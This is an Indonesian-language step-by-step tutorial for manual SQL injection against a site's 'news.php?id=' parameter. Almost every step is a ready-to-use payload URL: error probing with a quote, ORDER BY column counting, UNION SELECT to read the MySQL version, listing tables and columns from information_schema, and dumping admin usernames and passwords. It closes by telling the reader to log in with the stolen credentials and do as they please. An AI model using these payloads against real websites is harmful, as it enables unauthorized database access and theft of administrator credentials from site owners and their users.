Manual SQL Injection

SQL Injection Step By Step :

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/news.php?id=100
2. Tambahkan tanda ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. Contoh : http://www.target.com/news.php?id=100' atau http://www.target.com/news.php?id=-100 | Maka akan muncul pesan error... | "You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1" Dan masih banyak lagi macamnya.|
3. selanjutnya adalah mencari dan menghitung jumlah table yang ada dalam databasenya... Disini kita akan menggunakan perintah order by. Contoh : http://www.target.com/news.php?id=100+order+by+1/* | "/*" ? adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja... | Kalau "+" sebagai penghubung perintah... | Nah sampe sini langsung dah nyobain satu2... | http://www.target.com/news.php?id=100+order+by+1/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+2/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+3/* (gak ada error) | http://www.target.com/news.php?id=100+order+by+4/* (jangan nyerah) | Sampai muncul error... | Misalkan errornya disini... | http://www.target.com/news.php?id=100+order+by+10/* | Berarti yang kita ambil adalah "9" | http://www.target.com/news.php?id=100+order+by+9/*
4. Untuk mengetahui berapa angka yang show sekarang kita pake UNION Contoh : http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/* | Trus perhatikan angka berapa yang keluar. | Misalnya angka yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version" | http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/* Atau http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
5. Nah kalau versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database... Contoh : http://www.target.com/news.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
6. Misalnya yang lo liat adalah table "admin" Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya... Contoh: | http://www.target.com/news.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/* | Misalnya kolom yang keluar adalah "password" dan "username" Langsung aja kita liat isinya... | Contoh : http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/* dan http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
7. Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...

Refrensi :

• http://kill-nines.blogspot.com/search/label/SQLi